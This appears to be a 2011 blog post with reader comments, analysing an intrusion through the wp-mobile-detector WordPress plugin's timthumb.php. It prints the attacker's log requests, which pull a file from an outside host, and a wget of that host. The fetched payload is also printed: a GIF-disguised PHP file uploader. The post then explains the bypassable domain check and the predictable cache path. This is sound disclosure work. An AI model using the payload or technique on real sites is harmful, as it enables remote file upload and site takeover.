wp-mobile-detector is insecure (wordpress plugin)

It seems installing the wp-mobile-detector plugin on your wordpress site is a bad idea {tm}

A customer’s web server has the following requests in it :

[24/Aug/2011:02:10:47 +0100] "HEAD /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://superflickr.com.nu/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
[24/Aug/2011:02:10:48 +0100] "GET /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
[24/Aug/2011:02:10:48 +0100] "POST /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52 "-" "Opera 11.00"
[24/Aug/2011:02:10:49 +0100] "GET /wp-content/uploads/_wp_cache.php HTTP/1.1" 200 12970 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"

_wp_cache.php is one of those all-in-one-hacker-delight-control-panel things.

Making a request to superflickr.com.nu shows  :

$ wget -qO - http://superflickr.com.nu/index.php
GIF89a????!?,D;<?php $f=preg_replace('/(.*wp-content).*/i','\1',dirname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);echo "14qhpo"; ?>;

Suffice to say this is then stored on the server via timthumb.php. The timthumb.php script does attempt to use a list of allowed sites :

$allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'amazonaws.com',
);

But it’s check is somewhat flawed –

                        
foreach ($allowedSites as $site) {
      //$site = '/' . addslashes ($site) . '/';
      if (stristr($url_info['host'], $site) !== false) {
         $isAllowedSite = true;
      }
}

Hence, superflickr.com.nu escapes through, as it contains the string ‘flickr.com’.

And then, because it performs an ‘md5’ of the remote URL/file, which is predictable, the attacker knows where to access the saved file. A simple .htaccess file to block .php files from being accessed in the ‘cache’ directory would have solved this.

Alternatively the developers could have bothered to check the extension of the URL being retrieved….


Posted

in

by

Tags:

Comments

6 responses to “wp-mobile-detector is insecure (wordpress plugin)”

  1. Acouphene Avatar

    Did you contact the plugin developpers to tell them about this issue ?

  2. David Goodwin Avatar

    Acouphene – yes; they replied saying they were releasing a fix in a couple of days time (which I believe they have done).

  3. Geoff Avatar
    Geoff

    I am hoping the fix has been done. I installed the free version on a couple of my blogs earlier today via the WordPress plugin so I could try it out.

  4. lorraine Avatar
    lorraine

    This has not been fixed. I bought and installed the plugin in July and my whole site was corrupted with Malware. I contacted support several times to no avail. I wasted days and days rebuilding. I tried again and cleaned first: my results were:

    This file may contain malicious executable code
    Filename: wp-content/plugins/a-wp-mobile-detector/functions.php
    File type: Not a core, theme or plugin file.
    Issue first detected: 31 secs ago.
    Severity: Critical
    Status New
    This file is a PHP executable file and contains a line 2045 characters long without spaces that may be encoded data along with functions that may be used to execute that code. If you know about this file you can choose to ignore it to exclude it from future scans.

    Do not use.

  5. David Goodwin Avatar

    Lorraine – I suspect you’re using an old version somewhere. I think the problem has been fixed.

  6. Joshua Odmark Avatar
    Joshua Odmark

    This issue was fixed shortly after David brought it to our attention.

    Lorraine, please feel free to contact me if you’re still having issues.

Leave a Reply

Your email address will not be published. Required fields are marked *